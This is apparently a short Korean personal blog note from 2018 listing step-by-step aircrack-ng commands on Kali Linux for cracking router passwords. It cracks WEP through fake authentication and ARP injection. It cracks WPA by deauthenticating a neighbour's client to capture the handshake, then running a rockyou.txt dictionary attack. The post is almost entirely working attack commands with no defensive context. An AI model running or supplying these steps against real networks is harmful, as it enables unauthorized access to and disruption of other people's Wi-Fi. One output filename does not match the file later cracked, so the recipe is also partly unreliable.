무선 공유기 패스워드 …

11월 13, 2018   //   alexken작성   //   기술  //  No Comments

무슨 내용인지 하나로 모르지만 일단 정리…(타이핑은 시골집 고양이가 수행함)

Kali Linux에서 진행

AP MAC 90:9F:33:XX:XX:XX
Client MAC 64:6E:69:XX:XX:XX

기본 도구들

  • iwconfig
  • iw phy0 info
  • iwlist channel

WEP의 경우

1. 모니터 모드 시작 & AP 덤프

  airmon-ng start wlan0
  airodump-ng --channel 8 --bssid 90:9F:33:XX:XX:XX --write wepcrack wlan0mon

2. 데이터를 생성 하기 위해 인증 시도

  aireplay-ng -1 5000 -e SSID -a 90:9F:33:XX:XX:XX -h 64:6E:69:XX:XX:XX wlan0mon

3. ARP Injection으로 Data 강제 유발

  aireplay-ng -3 -b 90:9F:33:XX:XX:XX -h 64:6E:69:XX:XX:XX wlan0mon

4. IVS 값을 어느정도 수집하게 되면 크*

  aircrack-ng wepcrack.cap

WPA의 경우

1. 모니터 모드 시작 & AP 덤프

  airmon-ng start wlan0
  airodump-ng --channel 8 --bssid 90:9F:33:XX:XX:XX --write wepcrack wlan0mon

2. 옆에 놈 연결을 끊어서 EAPOL 노출

  aireplay-ng -0 10 -a 90:9F:33:XX:XX:XX -c 64:6E:69:XX:XX:XX wlan0mon

3. CAP 파일에서 사전공격으로 패스워드 추출

  aircrack-ng -b 90:9F:33:XX:XX:XX -w /usr/share/wordlists/rockyou.txt wifi-01.cap